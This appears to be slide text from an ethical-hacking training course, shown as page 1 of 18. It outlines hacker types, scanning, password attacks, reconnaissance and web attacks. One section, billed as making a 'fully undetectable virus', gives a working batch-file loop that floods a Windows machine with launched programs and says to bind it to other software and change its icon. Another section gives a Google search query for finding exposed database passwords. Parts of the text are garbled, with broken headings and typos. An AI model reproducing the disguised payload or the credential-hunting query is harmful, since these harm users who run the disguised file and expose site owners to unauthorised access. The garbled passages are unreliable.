You are on page 1of 18

WHY SECURITY

There are not enough well trained IT administrators and operations staff to meet the daily onslaught of cyber criminal and cyber terrorist activities. As cyber attacks increase, so does the demand for information security professionals who possess true network penetration testing and ethical hacking skills.

An ethical hacker is a computer and network expert who attacks a security system on behalf of its owners, seeking vulnerabilities that a malicious hacker could exploit.

TYPE OF HACKER
Blackhat

hacker Whitehat hacket Grayhat hacker Script kidder Undrego Employee

MODES OF HACKING
Social Engineering Remote Hacking Local Hacking

NEED TO HACK YOUR OWN SYSTEMS


Thats the basis for ethical hacking. The law of averages works against security. With the increased numbers and expanding knowledge of hackers combined with the growing number of system vulnerabilities and other unknowns, the time will come when all computer systems are hacked or compromised in some way. you know hacker tricks, you can understand how vulnerable your systems are. Hacking preys on weak security practices and undisclosed vulnerabilities. As hackers expand their knowledge, so should you.

WHAT IS VULNERABILITY?

Software applications, such as the Microsoft operating system or your web browser are complex feats of engineering, often with millions of lines of programming code. Inevitably, errors creepinto the code, and some of these errors create security vulnerabilities that malefactors can take advantage of with exploits and other malware.

WHAT DOES A ETHICAL HACKER DO ?


Information Gathering / Foot printing Port Scanning 7 OS Fingerprinting Vulnerability Assessment Search & Build Exploit Attack Maintain Access Covering tracks .

SCANNING THE MOST IMPORTANT


Types

of scans - Network sweeps, network tracing, port scans, OS fingerprinting, version scans, and vulnerability scansOverall scanning tips - tcpdump for the pen tester, and Packet crafting for the pen tester with Hping3 and monitoring with Port scanning in-depth with traditional traceroute and exotic network mapping techniques

PASSWORD ATTACKS
The primacy of passwords Password attack tips: Making the most of password attacks in a safe and efficient manner Account lockout and strategies for avoiding it Password representation formats in depth: Windows LANMAN, NT, NTLMv1, NTLMv2, Unix DES, and Linux MD5

INFORMATION GATHERING
This is black box testing technique which bring up the basic information about a target or victim.This is first step for any hacking or security Rate of attacks also slow.

Manual process by www.whois.com. 2. You get signal online tools. 3. Ping command is used find ip address. 4. By googling. Automated process by many tools. Samspade . Metagoofil.
1.

GOOGLING
Link:cetpainfotech.com Related:cetpainfotech.com inurl:app/etc/local.xml :to know database passwd. Intitle Inurl /view/shtml Filetype Adminlogin.aspx

SCANNING
After

TOOLS

gathering informations of target we need to know the os and applications running on target. Gui Nmap . Angry ip scanner. Webarchive.org:to know the history of a website.

EMAIL HACKING
Phishing Tabnabbing Keylogger

MAKE A FULLY UNDETECTABLE VIRUS (THE APPLICATION BOMBER)

Use shell scripting.


open notepad & type @echo off :loop start notepad start compmgmt.msc start mspaint start osk start cmd start explorer start control start calc goto loop

Convert it as a batch file and bind with any software after that change icon

SECURING WINDOWS
Password policy. Ntfs security. Folder security. Image hide. Virus and trojans. Changing icons by resource hacker. Secure login by roho logon.

TYPE OF NETWORK ATTACKS


Denial of service attack. Address spoofing. Network sniffing. Arp poisoning.

Etc

WEBSITE ATTACKS
Cross site scripting. Sql injection. Remote file inclusion.

PENETRATION TESTING

Penetration testing, also referred to as pen testing or pentesting, is one way to assess the security of a computer system or network, also that of online computing systems. This process is carried out by simulating an unauthorized breach both by malicious outsiders as well as by insiders. The pentesting process generally involves a thorough analysis of the system in order to find out lurking vulnerabilities in it, which a hacker could possibly take advantage